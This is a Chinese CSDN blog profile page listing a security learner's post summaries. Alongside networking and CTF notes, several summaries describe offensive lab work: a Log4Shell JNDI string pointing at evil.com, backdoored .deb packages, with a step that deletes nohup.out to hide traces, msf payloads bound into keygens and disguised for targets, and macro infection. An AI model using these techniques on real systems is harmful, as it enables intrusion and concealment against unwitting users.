佟以冬
码龄3年
关注
提问 私信
  • 博客:22,643
    22,643
    总访问量
  • 20
    原创
  • 118,184
    排名
  • 501
    粉丝
  • 42
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:重庆市
  • 加入CSDN时间: 2021-12-24
博客简介:

m0_65764670的博客

查看详细资料
  • 原力等级
    领奖
    当前等级
    3
    当前总分
    286
    当月
    10
个人成就
  • 获得119次点赞
  • 内容获得20次评论
  • 获得173次收藏
创作历程
  • 7篇
    2024年
  • 13篇
    2023年
成就勋章
TA的专栏
  • 网络安全
    3篇
兴趣领域 设置
  • Python
    python
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

Burp自动化测试xss漏洞(phantomjs浏览器)

优点:使用burp自动测试xss漏洞速度会比自己手动快速缺点:会产生大量访问请求,如果是存储类型会污染网站如何避免:摸清网站的规则,自己写规则,在本地批量测试批量测试可以使用bp,验证使用phantomjs浏览器(成功会对其进行标记但在bp中需要安装插件),工具测试完成需要复测(弄完之后需要关闭插件否则会很慢)代理地址(浏览器没改就不改这是默认)和字符(可以改也可以默认)payload括号里大写部分是要执行的代码(可自行添加)
原创
发布博客 2024.06.25 ·
509 阅读 ·
10 点赞 ·
0 评论 ·
3 收藏

宏感染(无免杀)

宏:在Microsoft Word文档中,宏(Macro)是一种自动化任务的方式,它允许用户录制一系列操作,并将其保存为一个可重复执行的脚本。通过宏,用户可以自定义并自动执行一系列的操作,例如格式设置、文本替换、图表创建等。这使得用户能够提高生产效率,并简化重复性任务的执行过程。
原创
发布博客 2024.06.06 ·
198 阅读 ·
2 点赞 ·
0 评论 ·
3 收藏

CVE-2021-44228漏洞复现

此漏洞为log4j2漏洞,log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
原创
发布博客 2024.05.29 ·
2440 阅读 ·
13 点赞 ·
1 评论 ·
13 收藏

thinkphp 5.0.23 rce 漏洞复现

这里的rce是远程命令,此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0​查看适用版本。设置靶机和攻击机IP。
原创
发布博客 2024.05.29 ·
589 阅读 ·
6 点赞 ·
0 评论 ·
0 收藏

注册机捆绑恶意程序(无免杀)

kali中需具备binding和需捆绑的程序或者其他东西这里是crt和win10(win10需要关闭安全程序)八、运行程序(运行时两个程序会分开原本为46个,现在为47个msf文件会在后台运行不会直接显示)注:exe本身不可以去掉因为这本就为exe文件,去掉了文件将会被更改。六、下载到目标主机,记得伪装(捆绑的程序为正常工具和msf的合体)注:每个更新方式都会有不同的影响,建议使用覆盖或者跳过。注:这里将所有图片名字都进行了更改,因此图片会打不开。打开程序(这里打开了计算器)1、准备一张图片和恶意程序。
原创
发布博客 2024.05.21 ·
585 阅读 ·
3 点赞 ·
0 评论 ·
6 收藏

制作恶意deb软件包触发后门

sudo nohup /usr/games/freesweep_sources &​​:系统后台不挂断,防止注销或退出shell时命令终止。​sudo chmod +x /usr/games/freesweep_sources​​:安装完成后会给程序加上执行权限。​sudo rm -rf /nohup.out​​:因为执行了上一条命令会生成nohup.out文件,防止被发现得删除。查看小程序包含内容,其中,postinst表示安装完要执行的,postrm安装完要删除处理的。关闭终端后连接依然继续。
原创
发布博客 2024.03.20 ·
295 阅读 ·
9 点赞 ·
1 评论 ·
4 收藏

CVE-2020-0796漏洞复现

此漏洞为基于win10 1903基于底层smb的3.1.1版本漏洞("SMB"代表"Server Message Block",是一种用于在计算机之间共享文件、打印机和其他资源的通信协议),此漏洞靶机需开445端口,如未开445端口则无法进行实验。
原创
发布博客 2024.03.13 ·
742 阅读 ·
5 点赞 ·
0 评论 ·
12 收藏

使用yum安装时出现报错

注:mount是临时挂载,可能之后还会出现这个错误,永久挂载可以在/etc/fstab中进行永久挂载。​mount /dev/sr0 /mnt/cdrom​​:挂载(根据情况选择盘)​mount | grep cdrom​​:查看是否挂载(如没有反应是没挂载)​ls /mnt/cdrom​​:查看是否有这个文件。这个问题是提示没有挂载。
原创
发布博客 2023.12.26 ·
211 阅读 ·
0 点赞 ·
2 评论 ·
1 收藏

centos7忘记root密码无法登录的情况下修改密码(不进入系统修改密码)

有时候我们或许在长时间没有使用centos的情况下记不住密码,亦或者密码太多记混了,在不想重装系统的情况下可以试试直接修改root密码这个方法。第六步:进入之后便可直接修改密码:直接使用passwd修改密码即可,如果需要换成英文显示则可以输入LANG=en,切换至英文状态如下图所示。第二步:进去之后,找到以下内容(这个内容一般在最后),并在后面加上rd.break(不直接进入系统而是进入到一个解析模式)第四步:写下以下内容,这段表示以读写的方式重新挂载(sysroot是指系统的根)
原创
发布博客 2023.12.13 ·
362 阅读 ·
0 点赞 ·
2 评论 ·
1 收藏

NSSCTF-CRYPTO WP

根据密文可发现都是由数字和前六个字母组成,和md5的特征符合,由32位16进制组成,那么直接解密即可。我们通过编码形式可以看出这是由核心价值观加密后的内容,我们直接利用网上的解码器直接解码。在密文后面我们看见了一个等号,那么就可以联想到base64,解密之后直接就解出了明文。根据题目标签可知,这是uuencode,直接放入里面解密即可。
原创
发布博客 2023.11.13 ·
217 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

vmware虚拟机安装后无法联网的情况

有些时候我们安装完vmware后搭建虚拟机,发现怎么始终无法联网,下面我提供了几种解决方法提供参考。
原创
发布博客 2023.11.12 ·
2267 阅读 ·
2 点赞 ·
1 评论 ·
3 收藏

ensp中trunk接口的配置以及三层交换机和单臂路由的简单配置

最后设置允许通过的vlan:port trunk allow-pass vlan 10 20 (在这个实验中我们的vlan少可以输入all)可以做网关配置,pc将数据通过二层交换机交给三层,三层通过处理交给不同网段的pc。将一个接口分成两个子接口,一个子接口对应一个网关一个vlan。用于交换机之间允许多个vlan通信,它会识别vlan标签。配置完成之后便可以实现不同网段和不同vlan之间进行通信了。目前的配置中是无法完成pc1和pc3之间的通信的。进入vlan配置:int vlanif 10。
原创
发布博客 2023.11.07 ·
3981 阅读 ·
7 点赞 ·
2 评论 ·
29 收藏

[SWPUCTF 2021 新生赛]crypto2-WP

RSA——共模攻击。
原创
发布博客 2023.10.16 ·
326 阅读 ·
3 点赞 ·
1 评论 ·
2 收藏

ensp-划分vlan

拓扑图如上图所示,在没有任何配置的情况下拓扑中的所有pc都能互相通信,我们的实验目标就是进行虚拟隔离也就是创建vlan,将pc1和pc3划分为一个vlan pc2 和pc4为一个vlan,达成pc1和pc3能互相通信而pc1,pc2和pc4无法通信,pc2和pc4能互相通信而pc2、pc1和pc3无法通信。port trunk allow-pass vlan [id1] [id2]:该端口允许的vlan通过。vlan [id]:创建vlan(有vlan直接进入,没有vlan创建vlan进入)
原创
发布博客 2023.10.08 ·
4625 阅读 ·
25 点赞 ·
5 评论 ·
75 收藏

应急响应-windows分析排查

计算机病毒和木马令人闻风丧胆,计算机病毒会自我复制并传播到其他计算机上,因此它可以通过网络或媒介传播,例如通过电子邮件附件、可移动存储设备或下载文件。木马(Trojan)是一种欺骗性程序,它通常伪装成有用或有吸引力的软件或文件。一旦被启动,木马就开始执行恶意操作,例如窃取用户信息、监视用户活动或打开后门以便黑客入侵。(进行排查之后,我就发现了没有删除干净的软件,可想而知一些流氓软件和一些病毒木马大同小异)
原创
发布博客 2023.10.07 ·
123 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

ctf密码学-古典密码(1)

古典密码学是指在计算机和数字通信技术出现之前的密码学研究,主要包括早期的加密方法、密码破解技术和密码学理论。而我们这里要讲的就是在ctf中我们可能遇到的一些题目。古典密码多为加密算法,我们只需解密即可,而最常见的一些加密我们需要探究它的原理,然后进行编写脚本,在本地中自己编写的脚本或许会更加全面,也可以随时更改,后面我会介绍到其他的古典密码,感兴趣的可以了解一下。
原创
发布博客 2023.10.06 ·
1642 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

【网工基础】-网络设备和相关配置(ensp)

用于IP报文在网络中的寻址,分为网络位(标识属于什么网段)、主机位(主机可用地址)、子网掩码决定网络位的长度 例如:IP:192.168.1.0 掩码:255.255.255.0那么网络为就为192.168.1 主机位就为0。AR1中g0/0/1端口配置,因上文中已配置g0/0/0,因此不再对它进行配置直接使用即可,AR2两个端口同理,IP在拓扑中有展。5.到这里并没有完,有来有回,pc端向服务器发送了请求,那么服务器也会发送回应,因此我们还需要配置AR2的路由表(步骤相同)
原创
发布博客 2023.09.28 ·
2700 阅读 ·
24 点赞 ·
1 评论 ·
20 收藏

汇编入门(1)

找到output 将它等号后面的改成ddraw,然后上面windowresolution等号后面的值改为任意大小,根据自己的情况自定,我这里改的是1200x640(也就是第三张图所示)mount c g:masm 将g盘中的masm挂在到c盘(我的masm在g盘所以是g:masm,如果你的在d盘就是d:masm 可以挂载到任意盘)1. 可以直接操作硬件:汇编语言可以直接访问计算机的硬件资源,包括IO端口、中断向量表、内存等,因此在需要进行低级编程或与硬件交互的场景下非常有用。
原创
发布博客 2023.09.27 ·
66 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

网络安全常用语

webshell就是asp、php、jsp、之外的web代码文件,通过这些代码文件可以执行任意命令,对计算机做任意的操作。0day:使用量非常大的通用产品漏洞已经被发现但还没有公开,官方还没有发布补丁或者修复方法的漏洞。抓鸡:利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。1day:漏洞的POC和EXP已经被公开了,但是很多人还来不及修复。拖库:网站被入侵后,黑客把全部数据导出,窃取到了全部数据的数据文件。Nday:已经发布官方补丁的漏洞,并且时间过去很久的漏洞。
原创
发布博客 2023.09.06 ·
102 阅读 ·
1 点赞 ·
1 评论 ·
0 收藏

如何进行渗透测试(渗透测试的大致流程——0基础)

信息收集在渗透测试中尤为重要,信息收集的越全面,那么渗透测试的过程就会相对应的更加顺利,得到的内容也会更加全面,那么渗透测试可以从以下几个方面入手:域名、子域名、端口、网站架构、目录结构、apache、jdk、waf、cdn、旁站、c端、cms指纹等。我们平时访问的网站都是前端内容,企业能让我们看见的,而后端大部分放着这个网站的数据,用户信息等,如果能从前端访问到后端的内容我们可以说是能直接看到其核心。它可以快速搜索和定位感兴趣的目标,比如网站、服务器、设备、漏洞等等,是信息收集的一大好手。
原创
发布博客 2023.06.07 ·
276 阅读 ·
1 点赞 ·
1 评论 ·
0 收藏
加载更多